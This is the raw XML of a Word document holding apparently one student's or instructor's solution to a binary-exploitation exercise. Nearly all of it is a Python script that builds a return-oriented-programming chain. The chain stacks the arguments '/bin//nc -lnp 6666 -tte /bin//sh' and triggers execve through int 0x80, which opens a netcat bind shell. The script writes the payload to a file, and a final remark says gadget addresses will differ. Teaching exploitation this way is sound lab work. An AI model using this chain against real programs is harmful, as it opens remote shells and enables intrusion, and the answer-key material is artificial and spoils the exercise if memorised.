      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 60)</w:t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  <w:t># shadow stack address (@ of arguments)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AB1EB7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DUMMY</w:t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  <w:t xml:space="preserve"># padding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C63EE8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DUMMY</w:t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  <w:t xml:space="preserve"># padding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B67F763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</w:p>
    <w:p w14:paraId="3E8A7824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POPEAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612FDB7C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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR) </w:t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  <w:t># @ of "/bin//</w:t>
      </w:r>
      <w:proofErr w:type="spell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nc</w:t>
      </w:r>
      <w:proofErr w:type="spell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" 0th item of arguments[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04041F28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MOVISTACK</w:t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  <w:t># we place address of "/bin//</w:t>
      </w:r>
      <w:proofErr w:type="spell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nc</w:t>
      </w:r>
      <w:proofErr w:type="spell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" in our STACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2C05B8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</w:p>
    <w:p w14:paraId="0CE42290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POPALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270EA310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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 64)</w:t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  <w:t># we shift our Stack Pointer + 4 for the second argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779271DA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DUMMY</w:t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  <w:t xml:space="preserve"># padding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4826BE9E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DUMMY</w:t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  <w:t xml:space="preserve"># padding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B8825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</w:p>
    <w:p w14:paraId="6552B7A0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POPEAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315B5A34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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 9) </w:t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  <w:t># @ of "-</w:t>
      </w:r>
      <w:proofErr w:type="spell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lnp</w:t>
      </w:r>
      <w:proofErr w:type="spell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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A05802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MOVISTACK</w:t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  <w:t># we place address of "-</w:t>
      </w:r>
      <w:proofErr w:type="spell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lnp</w:t>
      </w:r>
      <w:proofErr w:type="spell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" in our STACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5CF368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</w:p>
    <w:p w14:paraId="3AF2BCD7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POPALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4358B4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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 68)</w:t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  <w:t># we shift our Stack Pointer + 4 for the 3rd argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAEA7A3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DUMMY</w:t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  <w:t xml:space="preserve"># padding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2662058A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DUMMY</w:t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  <w:t xml:space="preserve"># padding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197B3336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</w:p>
    <w:p w14:paraId="26685B50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POPEAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C83C47D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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 14) </w:t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  <w:t># @ of "6666"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36159A45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MOVISTACK</w:t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  <w:t xml:space="preserve"># we </w:t>
      </w:r>
      <w:proofErr w:type="spell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palce</w:t>
      </w:r>
      <w:proofErr w:type="spell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 address of "6666" in our STACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CC1F02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</w:p>
    <w:p w14:paraId="32CE76AE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POPALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ABBADE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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 72)</w:t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  <w:t># we shift our Stack Pointer + 4 for the 4th argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182C9F55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DUMMY</w:t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  <w:t xml:space="preserve"># padding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E93AB4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DUMMY</w:t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  <w:t xml:space="preserve"># padding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487DAF0E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</w:p>
    <w:p w14:paraId="18B1979D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POPEAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70121F40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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 19) </w:t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  <w:t># @ of "-</w:t>
      </w:r>
      <w:proofErr w:type="spell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tte</w:t>
      </w:r>
      <w:proofErr w:type="spell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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0245C374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MOVISTACK</w:t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  <w:t># we place address of "-</w:t>
      </w:r>
      <w:proofErr w:type="spell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tte</w:t>
      </w:r>
      <w:proofErr w:type="spell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" in our STACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4967ED84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</w:p>
    <w:p w14:paraId="330FB986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POPALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4D089E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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 76)</w:t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  <w:t># we shift our Stack Pointer + 4 for the 5th argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F50856B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DUMMY</w:t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  <w:t xml:space="preserve"># padding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1B22A1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DUMMY</w:t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  <w:t xml:space="preserve"># padding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0C3C46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</w:p>
    <w:p w14:paraId="437135B4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POPEAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6925FFFF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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 24) </w:t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  <w:t># @ of "/bin//</w:t>
      </w:r>
      <w:proofErr w:type="spell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sh</w:t>
      </w:r>
      <w:proofErr w:type="spell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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DAD005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MOVISTACK</w:t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  <w:t># we place address of "/bin//</w:t>
      </w:r>
      <w:proofErr w:type="spell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sh</w:t>
      </w:r>
      <w:proofErr w:type="spell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" in our STACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726B4FB7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</w:p>
    <w:p w14:paraId="19DE2215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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CE4A2E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    # Now we must implement </w:t>
      </w:r>
      <w:proofErr w:type="spell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eax</w:t>
      </w:r>
      <w:proofErr w:type="spell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 to contain the address of </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A00BCA5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    # </w:t>
      </w:r>
      <w:proofErr w:type="gram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the</w:t>
      </w:r>
      <w:proofErr w:type="gram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 </w:t>
      </w:r>
      <w:proofErr w:type="spell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execve</w:t>
      </w:r>
      <w:proofErr w:type="spell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 </w:t>
      </w:r>
      <w:proofErr w:type="spell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syscall</w:t>
      </w:r>
      <w:proofErr w:type="spell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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0952028D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    # </w:t>
      </w:r>
      <w:proofErr w:type="spell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execve</w:t>
      </w:r>
      <w:proofErr w:type="spell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 = 0xb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A389166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    #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572EB60B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</w:p>
    <w:p w14:paraId="360AA27B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XOREAX</w:t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  <w:t># %</w:t>
      </w:r>
      <w:proofErr w:type="spell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eax</w:t>
      </w:r>
      <w:proofErr w:type="spell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 is put to zero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51082465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INCEAX * 11</w:t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  <w:t># %</w:t>
      </w:r>
      <w:proofErr w:type="spell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eax</w:t>
      </w:r>
      <w:proofErr w:type="spell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 is now 0xb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40691D1E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POPALL</w:t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  <w:t xml:space="preserve"># last pop </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8EED5B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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 48) </w:t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  <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spell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edx</w:t>
      </w:r>
      <w:proofErr w:type="spell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 char *env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55346D49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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 60) </w:t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  <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spell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ecx</w:t>
      </w:r>
      <w:proofErr w:type="spell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 char **arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57517052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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR)      </w:t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  <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spell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ebx</w:t>
      </w:r>
      <w:proofErr w:type="spell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 "/</w:t>
      </w:r>
      <w:proofErr w:type="spell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usr</w:t>
      </w:r>
      <w:proofErr w:type="spell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/bin//</w:t>
      </w:r>
      <w:proofErr w:type="spell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nc</w:t>
      </w:r>
      <w:proofErr w:type="spell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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4EDBB8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buff += INT80</w:t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</w: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ab/>
        <w:t># we execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E500B31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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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outfile.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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(buff)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCA3F7B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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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outfile.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF1FBB8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</w:p>
    <w:p w14:paraId="4A5297DC" w14:textId="77777777" w:rsidR="002B4578" w:rsidRPr="002B4578" w:rsidRDefault="002B4578" w:rsidP="002B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enlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr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#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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>print</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> buff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D98C0D7" w14:textId="77777777" w:rsidR="002B4578" w:rsidRPr="002B4578" w:rsidRDefault="002B4578" w:rsidP="002B4578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2B4578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(My solution... your gadget addresses will differ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1002F2BD" w14:textId="77777777" w:rsidR="002B4578" w:rsidRDefault="002B4578"/>
    <w:sectPr w:rsidR="002B4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B1E8E" w14:textId="77777777" w:rsidR="002B4578" w:rsidRDefault="002B4578" w:rsidP="002B4578">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0ACA37C6" w14:textId="77777777" w:rsidR="002B4578" w:rsidRDefault="002B4578" w:rsidP="002B4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5520A" w14:textId="77777777" w:rsidR="002B4578" w:rsidRDefault="002B4578" w:rsidP="002B4578">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5E56478B" w14:textId="77777777" w:rsidR="002B4578" w:rsidRDefault="002B4578" w:rsidP="002B45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78"/>
    <w:rsid w:val="00077C2D"/>
    <w:rsid w:val="002B4578"/>
    <w:rsid w:val="002E32E4"/>
    <w:rsid w:val="00B9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AC2D10"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CE9B7EBA-FE5B-4399-A255-2B8F11E4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B45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57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7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920</Words>
  <Characters>5249</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>43</Lines>
  <Paragraphs>12</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Belguith</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sana Belguith</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-25T10:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-25T10:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>